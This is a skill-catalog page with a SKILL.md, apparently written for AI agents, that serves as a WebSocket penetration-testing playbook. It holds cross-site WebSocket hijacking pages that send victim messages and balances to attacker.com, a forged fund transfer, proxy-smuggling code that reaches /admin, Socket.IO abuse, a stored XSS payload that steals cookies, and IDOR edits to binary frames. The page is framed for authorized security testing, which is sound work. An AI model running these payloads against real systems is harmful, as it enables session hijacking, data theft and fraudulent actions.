websocket-security
yaklang/hack-skills
Test WebSocket security: handshakes, CSWSH, injection, and real-time channel flaws.
What is websocket-security?
Covers WebSocket protocol basics, cross-site WebSocket hijacking (CSWSH), practical testing tools (wsrepl, ws-harness, Burp), and common vulnerabilities. Use when applications rely on real-time channels, chat, notifications, or WebSocket-backed APIs.
- Identify and validate WebSocket handshake headers (Upgrade, Sec-WebSocket-Key, Sec-WebSocket-Accept)
- Detect cross-site WebSocket hijacking (CSWSH) by testing Origin validation and session binding
- Test for authentication and authorization flaws in WebSocket endpoints using tool bridges and session replay
- Fuzz WebSocket message payloads for injection vulnerabilities (SQL, command, XSS)
- Identify transport and configuration issues (cleartext ws://, token leakage in URLs, missing rate limiting)
- Detect WebSocket smuggling and proxy bypass techniques
How to install websocket-security
npx skills add https://github.com/yaklang/hack-skills --skill websocket-security- Python 3.6+ and pip for wsrepl and ws-harness tools
- Burp Suite Community or Professional for SocketSleuth and WebSocket Turbo Intruder extensions
- Browser DevTools or proxy to inspect WebSocket handshake and frame traffic
- Access to target WebSocket endpoint and valid session credentials for testing
How to use websocket-security
- 1.Identify WebSocket endpoints from JavaScript bundles, API documentation, or proxy traffic (filter for HTTP 101 responses)
- 2.Intercept the WebSocket upgrade handshake in Burp and review Origin, Host, Cookie, and Sec-WebSocket-* headers
- 3.Test Origin validation by modifying the Origin header to an attacker domain and checking if the server accepts the connection
- 4.Replay the WebSocket connection with another user's session cookies to test for IDOR and data leakage across sessions
- 5.Use wsrepl or ws-harness to send crafted or fuzzed message payloads and test for injection vulnerabilities
- 6.Create a proof-of-concept HTML page that opens a WebSocket connection to the target to simulate CSWSH in a controlled environment
- 7.Verify transport security (wss:// vs ws://) and check for authentication tokens in query strings or message bodies
- 8.Review message semantics and rate limiting; apply the same fuzzing and logic testing as HTTP API endpoints
Use cases
- Penetration testing real-time chat or notification systems for CSWSH and message injection
- Auditing financial or trading platforms using WebSocket APIs for session hijacking and unauthorized actions
- Testing IoT or live-update dashboards for authentication bypass and data exfiltration
- Fuzzing WebSocket message bodies for SQL injection or command injection flaws
- Validating Origin and SameSite cookie policies to prevent cross-origin WebSocket attacks
- Security testers and penetration testers auditing real-time applications
- API security specialists extending HTTP API testing to WebSocket endpoints
- Developers validating WebSocket authentication and authorization models
- Red teamers simulating CSWSH and session hijacking attacks in authorized assessments
websocket-security FAQ
CSWSH occurs when a server does not validate the Origin header on a WebSocket upgrade request and the victim has an active session (cookie-based). An attacker can load a malicious page in the victim's browser that opens a WebSocket connection to the target site as the victim, allowing the attacker to read and write messages on a persistent bidirectional channel.
Intercept the WebSocket upgrade request in Burp, change the Origin header to an attacker-controlled domain, and check if the server responds with HTTP 101 Switching Protocols. If it does, Origin validation is missing. Also test whether cookies are sent (check SameSite attributes) and whether subprotocol or custom headers are required. Create a proof-of-concept HTML page that connects to the target WebSocket endpoint to confirm the vulnerability in a controlled environment.
wsrepl (Python) allows interactive WebSocket testing with plugin support for authentication; ws-harness bridges WebSocket to HTTP for use with other tools like sqlmap; Burp Suite extensions SocketSleuth and WebSocket Turbo Intruder enable inspection and fuzzing of WebSocket traffic within Burp. Browser DevTools and proxy tools can also capture and inspect WebSocket handshakes and frames.
Missing Origin validation (CSWSH), authentication tokens in URLs (logged/leaked), no rate limiting on messages, use of cleartext ws:// instead of wss://, injection flaws in message bodies (SQL, command, XSS), and improper session binding across reconnections. WebSocket often shares authentication and authorization models with HTTP APIs, so test both together.
Always use wss:// (WebSocket Secure over TLS) in production to encrypt traffic and prevent man-in-the-middle attacks. Cleartext ws:// should only be used in development or local testing. Align wss:// with HSTS and other transport security policies used by your HTTP endpoints.
Full instructions (SKILL.md)
Source of truth, from yaklang/hack-skills.
name: websocket-security description: >- WebSocket handshake, CSWSH, tooling (wsrepl, ws-harness, Burp), and common flaws. Use when apps use real-time channels, chat, notifications, or WS-backed APIs.
SKILL: WebSocket Security
AI LOAD INSTRUCTION: This skill covers WebSocket protocol basics, cross-site WebSocket hijacking (CSWSH), practical tooling bridges, and common vulnerability classes. Apply only in authorized tests; treat tokens and message content as sensitive. For REST/GraphQL companion testing, cross-load api-sec when present in the workspace.
0. QUICK START
During proxy or raw traffic review, watch for:
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Sec-WebSocket-Version: 13
Sec-WebSocket-Protocol: optional-subprotocol
Server success response indicators:
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=
Routing note: in Burp/browser DevTools, filter for 101 and Upgrade: websocket; for deeper API testing, align authn/authz models through api-sec.
1. PROTOCOL BASICS
Client request (typical)
Upgrade: websocketandConnection: Upgrade— required upgrade handshake.Sec-WebSocket-Key— base64 nonce; server hashes with magic GUID and responds withSec-WebSocket-Accept.Sec-WebSocket-Version: 13— current standard version for browser interoperability.
Server response
HTTP/1.1 101 Switching Protocols— handshake complete; subsequent frames are WebSocket binary/text frames per RFC.
Minimal conceptual flow:
Client: HTTP GET + Upgrade headers
Server: 101 + Sec-WebSocket-Accept
Channel: framed messages (text/binary), ping/pong, close
2. CROSS-SITE WEBSOCKET HIJACKING (CSWSH)
Condition
- The server does not validate
Origin(or equivalent binding) on the WebSocket handshake, and - The victim has an active session (cookie-based or browser-stored creds) to the target site.
Then a malicious page loaded in the victim’s browser may open a WebSocket as the victim, similar in spirit to CSRF but for a persistent bidirectional channel.
Proof-of-concept pattern (laboratory / authorized target only)
const ws = new WebSocket('wss://vulnerable.example.com/messages');
ws.onopen = () => { ws.send('HELLO'); };
ws.onmessage = (event) => {
fetch('https://attacker.example.net/?' + encodeURIComponent(event.data));
};
Testing notes: Confirm whether Origin is checked, whether cookies are sent (SameSite rules), and whether subprotocol or custom headers are required—missing checks increase CSWSH risk.
3. TESTING WITH TOOLS
wsrepl
pip install wsrepl
wsrepl -u wss://target.example.com/ws -P auth_plugin.py
Use a plugin to reproduce browser cookies, headers, or token refresh during the WebSocket lifecycle.
ws-harness (bridge to HTTP for other tools)
python ws-harness.py -u "ws://127.0.0.1:8765/path" -m ./message.txt
Example downstream use with SQL injection tooling over the bridged HTTP surface (adjust URL to local listener):
sqlmap -u "http://127.0.0.1:8000/?fuzz=test" --batch
Burp Suite ecosystem
- SocketSleuth — inspect and manipulate WebSocket traffic inside Burp.
- WebSocket Turbo Intruder — high-rate or scripted message fuzzing.
4. COMMON VULNERABILITIES
| Issue | Why it matters |
|---|---|
Missing Origin validation | Enables CSWSH from attacker-controlled pages |
Auth token in URL (wss://host/ws?token=...) | Logs, proxies, Referer leakage, browser history |
| No rate limiting on messages | Abuse, brute force, DoS |
ws:// instead of wss:// | Cleartext on the wire (MITM) |
| Injection in message bodies | SQLi, command injection, or XSS if content is stored/reflected elsewhere |
Example sensitive URL anti-pattern:
wss://api.example.com/stream?access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
Prefer Sec-WebSocket-Protocol, first-message auth, or cookie + CSRF token patterns aligned with product constraints.
5. DECISION TREE
- Identify endpoint — From JS bundles, Swagger, or
101responses; notewssvsws. - Handshake review — Are
Origin, Host, and Cookie policies correct? Any token in query string? - Session binding — Reconnect with another user’s cookie jar in Burp; compare subscription topics and data leakage.
- CSWSH — Load a local HTML page that connects to the target with victim session active; verify server rejects wrong Origin or uses non-cookie secret.
- Message semantics — Fuzz JSON/text payloads for injection; mirror same logic as HTTP API testing.
- Transport — Flag
ws://in production; verify TLS and HSTS alignment.
6. RELATED ROUTING
- From api-sec — authentication, authorization, IDOR, and rate limiting often mirror HTTP APIs behind the same WebSocket routes.
Note: WebSocket often shares session and permission models with REST; use api-sec to align authentication and resource boundaries on the same backend.
7. CSWSH — STEP-BY-STEP EXPLOITATION
Step 1: Confirm no Origin check on WS handshake
# In Burp: intercept the WebSocket upgrade request
# Change Origin header to: https://attacker.com
# If 101 Switching Protocols returned → no Origin validation
# If 403/rejected → Origin is checked (test subdomain variants)
Step 2: Craft attacker page
<html>
<body>
<script>
const ws = new WebSocket('wss://target.com/ws');
ws.onopen = function() {
// Connection established as victim (cookies sent automatically)
console.log('Connected as victim');
// Send commands as victim
ws.send(JSON.stringify({action: 'get_profile'}));
ws.send(JSON.stringify({action: 'list_messages'}));
};
ws.onmessage = function(event) {
// Exfiltrate all received messages
fetch('https://attacker.com/collect', {
method: 'POST',
body: event.data
});
};
ws.onerror = function(err) {
fetch('https://attacker.com/error?e=' + encodeURIComponent(err));
};
</script>
</body>
</html>
Step 3: Cookies and session hijacking
Browser behavior for WebSocket:
- Cookies for the target domain ARE sent automatically in the upgrade request
- SameSite=None cookies always sent
- SameSite=Lax cookies: NOT sent (WebSocket is not top-level navigation)
- SameSite=Strict cookies: NOT sent
Key question: is the session cookie SameSite=None or legacy (no SameSite attribute)?
→ Legacy cookies default to Lax in modern Chrome but None in older browsers
Step 4: Read/write messages as victim
// Attacker can both READ and WRITE on the WebSocket
// Read: financial data, private messages, admin commands
// Write: transfer funds, change settings, send messages as victim
ws.onopen = () => {
// Write: perform actions as victim
ws.send(JSON.stringify({
action: 'transfer',
to: 'attacker_account',
amount: 10000
}));
};
ws.onmessage = (e) => {
const data = JSON.parse(e.data);
if (data.type === 'balance') {
// Read: exfiltrate sensitive data
navigator.sendBeacon('https://attacker.com/data',
JSON.stringify(data));
}
};
8. WEBSOCKET SMUGGLING
Concept
Use the WebSocket upgrade to bypass reverse proxy restrictions, then tunnel arbitrary HTTP traffic through the WebSocket connection.
Upgrade-based proxy bypass
1. Reverse proxy restricts access to /admin (returns 403)
2. Client sends legitimate WebSocket upgrade to /ws
3. Proxy allows the upgrade (101 response)
4. After upgrade, proxy stops inspecting the connection (raw TCP passthrough)
5. Client sends raw HTTP request through the "WebSocket" connection:
GET /admin HTTP/1.1
Host: backend-server
6. Backend processes the HTTP request → 200 OK with admin content
H2-over-WebSocket smuggling
1. Connect to target via WebSocket
2. After upgrade, send HTTP/2 preface through the WebSocket tunnel
3. Backend HTTP/2 handler processes the smuggled requests
4. Bypass WAF/proxy rules that only inspect HTTP/1.1 traffic
Implementation with Python
import websocket
import ssl
ws = websocket.create_connection(
'wss://target.com/ws',
header=['Origin: https://target.com'],
sslopt={"cert_reqs": ssl.CERT_NONE}
)
# After upgrade, send raw HTTP through the tunnel
smuggled_request = (
b"GET /admin/users HTTP/1.1\r\n"
b"Host: internal-backend\r\n"
b"Connection: close\r\n\r\n"
)
ws.send(smuggled_request, opcode=0x2) # binary frame
response = ws.recv()
print(response)
Proxy-specific behaviors
| Proxy | WebSocket Tunnel Behavior |
|---|---|
| Nginx | Passes raw TCP after 101 — smuggling possible if backend doesn't validate WS frames |
| HAProxy | Depends on option http-server-close vs tunnel mode |
| AWS ALB | Terminates WebSocket — reframes traffic, harder to smuggle |
| Cloudflare | Inspects WebSocket frames — raw HTTP smuggling blocked |
| Varnish | Does not support WebSocket natively — upgrade may bypass cache entirely |
9. SOCKET.IO SPECIFIC VULNERABILITIES
Namespace injection
Socket.IO supports namespaces (/admin, /chat). If authorization is only on the default namespace:
// Client connects to privileged namespace without auth check
const adminSocket = io('https://target.com/admin');
adminSocket.on('connect', () => {
adminSocket.emit('list_users');
});
// Server may not verify that the client is authorized for /admin namespace
Event name injection
If event names are derived from user input:
// Server-side vulnerable pattern:
socket.on(userInput, handler);
// Attacker sends event name that matches internal event:
socket.emit('__disconnect'); // force disconnect other clients
socket.emit('connection'); // re-trigger connection handler
socket.emit('error'); // trigger error handler
Acknowledgement callback abuse
Socket.IO acknowledgements can return data. If the server sends sensitive data in ack callbacks:
socket.emit('get_data', {id: 'admin'}, (response) => {
// response may contain data the client shouldn't have access to
fetch('https://attacker.com/exfil', {
method: 'POST',
body: JSON.stringify(response)
});
});
Polling fallback CSRF
Socket.IO falls back to HTTP long-polling when WebSocket is unavailable. The polling transport uses regular HTTP requests with cookies → susceptible to CSRF if no additional token verification:
POST /socket.io/?EIO=4&transport=polling&sid=SESSION_ID
Content-Type: application/octet-stream
4{"type":2,"data":["transfer",{"to":"attacker","amount":1000}]}
10. WEBSOCKET MESSAGE INJECTION
In intercepted connections (MITM on ws://)
If the application uses ws:// (unencrypted), an attacker on the same network can inject messages:
1. ARP spoofing or network position to intercept traffic
2. Identify WebSocket frames in TCP stream
3. Inject crafted frames between legitimate messages
4. Both client→server and server→client injection possible
Application-level injection
When WebSocket messages are concatenated or interpolated without sanitization:
// Vulnerable server-side handler:
socket.on('chat', (msg) => {
// If msg contains JSON metacharacters:
broadcast(`{"user":"${username}","msg":"${msg}"}`);
// Injection: msg = '","admin":true,"msg":"hacked'
// Result: {"user":"attacker","msg":"","admin":true,"msg":"hacked"}
});
Stored XSS via WebSocket
1. Send WebSocket message: <img src=x onerror=alert(document.cookie)>
2. Server stores message and broadcasts to all connected clients
3. If client renders message as HTML → stored XSS
4. All connected users affected simultaneously
11. BINARY WEBSOCKET MESSAGE MANIPULATION
Protobuf deserialization
Applications using Protocol Buffers over WebSocket may be vulnerable to:
1. Capture binary WebSocket frame
2. Decode protobuf structure (use protoc --decode_raw or protobuf-inspector)
3. Modify field values (e.g., change user_id, amount, role)
4. Re-encode and send modified frame
5. Server deserializes without re-validating field constraints
# Decode captured binary frame
echo "CAPTURED_HEX" | xxd -r -p | protoc --decode_raw
# Output: field structure with types and values
# Modify, re-encode, send back through WebSocket
MessagePack deserialization
import msgpack
import websocket
ws = websocket.create_connection('wss://target.com/ws')
# Decode received binary message
raw = ws.recv()
data = msgpack.unpackb(raw, raw=False)
# data = {'action': 'get_balance', 'user_id': 123}
# Modify and re-send
data['user_id'] = 1 # IDOR: access admin's balance
ws.send(msgpack.packb(data), opcode=0x2)
Type confusion attacks
Binary serialization formats may allow type confusion:
# Original: user_id as integer (field type 0)
# Modified: user_id as string "1 OR 1=1" (field type 2)
# If server doesn't validate types after deserialization → SQL injection
# Original: is_admin as boolean false (0x00)
# Modified: is_admin as boolean true (0x01)
# Direct privilege escalation if server trusts deserialized values
Tools for binary WebSocket analysis
| Tool | Purpose |
|---|---|
| Burp Suite + SocketSleuth | Intercept and modify binary frames |
protobuf-inspector | Decode unknown protobuf structures |
msgpack-tools | Encode/decode MessagePack CLI |
wsdump (websocket-client) | Raw frame capture and replay |
| Wireshark | Dissect WebSocket frames at protocol level |
Related skills
More from yaklang/hack-skills and the wider catalog.

windows-av-evasion
AV/EDR evasion techniques for Windows: AMSI bypass, ETW patching, shellcode execution, and process injection.

windows-lateral-movement
Windows lateral movement via PsExec, WMI, WinRM, DCOM, RDP, and credential attacks.

windows-privilege-escalation
Windows local privilege escalation via token abuse, Potato exploits, service misconfigurations, DLL hijacking, and UAC bypass.

xslt-injection
XSLT injection testing: processor fingerprinting, XXE, document() SSRF, EXSLT write, and RCE surfaces.

xss-cross-site-scripting
Expert XSS attack playbook covering context-specific payloads, WAF/CSP bypass, and post-exploitation techniques.

xxe-xml-external-entity
Expert XXE injection playbook covering SOAP, Office files, SVG, OOB exfiltration, and SSRF chains.